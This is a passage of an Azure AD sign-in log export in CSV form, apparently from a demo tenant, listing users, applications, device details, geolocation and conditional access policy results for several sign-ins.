+22,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:07.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f3bec3a7-f4e4-40e6-84d4-f4bd67d184de,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 06:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",c883e3df-3efa-4676-93e1-2d9792dc0d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c883e3df-3efa-4676-93e1-2d9792dc0d00,SigninLogs,Sucess,36.6404686,-78.26995087
+23,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:46.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2fcfc429-d4d5-4f1a-b11f-08941b05341d,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",973ebc26-a5be-4a53-afb2-eb0848870e00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,973ebc26-a5be-4a53-afb2-eb0848870e00,SigninLogs,Sucess,50.6406517,5.572050095
+24,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:33.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1165b22-be1d-4e78-8b8a-73a0d8bbff2b,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 08:28,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'isCompliant': True, 'trustType': 'Hybrid Azure AD joined', 'isManaged': True}",a2ff6083-2da5-459b-8e38-d65fd5c90700,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,a2ff6083-2da5-459b-8e38-d65fd5c90700,SigninLogs,Sucess,51.4458313,-0.969720006
+25,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,25:02.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7390c1df-8e74-433c-b24b-2dfb0e2d68a3,Microsoft.aadiam,Microsoft.aadiam,,Message Trace Reporting,4,NL,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Exchange Online PowerShell,[],notApplied,09/04/2020 03:25,{'deviceId': ''},2903ae2d-5f7e-48a4-9564-1a66a58c0800,,,"{'countryOrRegion': 'NL', 'geoCoordinates': {'longitude': 4.940189838409424, 'latitude': 52.309051513671875}, 'state': 'Noord-Holland', 'city': 'Amsterdam'}",none,none,none,none,[],{'errorCode': 0},Message Trace Reporting,430f7f57-0d1a-4a8a-b8f5-5c5c0770ecaa,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,2903ae2d-5f7e-48a4-9564-1a66a58c0800,SigninLogs,Sucess,52.30905151,4.940189838
+26,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,45:41.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b22bbb2f-1eb4-43ee-8f57-7913f3570da2,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 07:45,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",973ebc26-a5be-4a53-afb2-eb08d7800d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,973ebc26-a5be-4a53-afb2-eb08d7800d00,SigninLogs,Sucess,50.6406517,5.572050095
+27,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,07:46.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,df7bb03d-9e9f-40b8-9fd8-4b067b91f85b,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 08:07,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",5afde7f0-808d-4fd5-9a61-613425f70d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,5afde7f0-808d-4fd5-9a61-613425f70d00,SigninLogs,Sucess,50.6406517,5.572050095
+28,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:59.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,19a7b510-f8d8-4f39-9dec-c9e5d06c323f,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 01:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",e9cfabe1-d666-446f-aeb7-5817966b0100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e9cfabe1-d666-446f-aeb7-5817966b0100,SigninLogs,Sucess,36.6404686,-78.26995087
+29,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:55.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e1b58562-5ee3-4616-8db2-9c76c5814f8f,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",86807d56-c656-4319-9bdc-577ed9520700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,86807d56-c656-4319-9bdc-577ed9520700,SigninLogs,Sucess,36.6404686,-78.26995087
+30,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:35.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b82b022-7914-48ec-b9e6-5a554c21726c,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,KH,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': 